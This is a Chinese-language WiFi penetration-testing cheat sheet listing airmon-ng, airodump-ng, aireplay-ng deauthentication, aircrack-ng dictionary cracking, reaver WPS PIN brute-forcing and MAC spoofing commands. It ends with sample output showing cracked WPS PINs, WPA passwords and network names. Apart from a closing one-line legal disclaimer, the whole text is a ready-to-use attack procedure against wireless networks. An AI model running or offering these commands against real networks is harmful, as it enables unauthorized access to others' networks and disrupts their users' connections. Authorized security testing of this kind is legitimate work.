Wifi渗透测试
使用airmon-ng
、airodump-ng
、aireplay-ng
和reaver
等工具来渗透 WiFi 网络。
网络监控与数据包捕获
-
查看网卡状态:
ifconfig
-
开启网卡监听模式: 将
网卡名
替换为您的无线网卡名称。airmon-ng start 网卡名
-
扫描附近的 WiFi 网络: 将
监听模式网卡名
替换为您的无线网卡在监听模式下的名称。airodump-ng 监听模式网卡名
-
捕获指定 WiFi 网络的数据包: 替换以下命令中的参数,其中
wifi的mac
是目标 WiFi 的 MAC 地址,信道
是目标 WiFi 所在的信道,抓包路径
是保存捕获数据包的文件路径。airodump-ng --bssid wifi的mac -c 信道 -w 抓包路径 监听模式网卡名
网络攻击与密码破解
-
发起 WiFi 攻击: 替换以下参数,
wifi中设备mac
是连接到目标 WiFi 的设备的 MAC 地址,wifi的mac
是目标 WiFi 的 MAC 地址。aireplay-ng -0 0 -c 设备mac -a wifi的mac 监听模式网卡名
-
使用字典攻击解密 WiFi 密码: 替换
字典路径
和抓包路径
为您的字典文件路径和捕获的数据包文件路径。aircrack-ng -w 字典路径 抓包路径
-
运行 PIN 攻击破解 WPS: 替换
无线网卡名
和目标AP的MAC
,并启用自动检测以优化攻击。reaver -i 无线网卡名 -b 目标AP的MAC -a -S
更改 MAC 地址
-
关闭网络接口:
/sbin/ifconfig eth0 down
-
更改 MAC 地址: 替换
00:0C:29:36:97:20
为您希望使用的新的 MAC 地址。/sbin/ifconfig eth0 hw ether 新MAC地址
-
重新启用网络接口:
/sbin/ifconfig eth0 up
-
重启网络服务:
systemctl restart network
成功案例
以下是成功破解的示例输出,其中包含了 WPS PIN、WPA PSK 和 AP SSID。
[+] WPS PIN: '33235202'
[+] WPA PSK: 'fuckBBC999'
[+] AP SSID: 'TP-LINK_BBC'
[+] WPS PIN: '14978531'
[+] WPA PSK: 'I'mIronMan'
[+] AP SSID: 'CMCC-IronMan'
确保遵守相关法律法规,并仅在授权的测试环境中使用